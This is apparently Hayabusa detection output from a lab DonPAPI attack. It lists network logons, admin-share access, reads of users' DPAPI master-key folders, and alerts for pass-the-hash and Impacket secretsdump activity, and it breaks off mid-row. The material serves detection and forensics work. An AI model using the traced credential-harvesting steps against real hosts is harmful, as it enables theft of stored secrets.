+09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.756 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.817 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.829 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:58.454 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.709 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.714 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.800 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 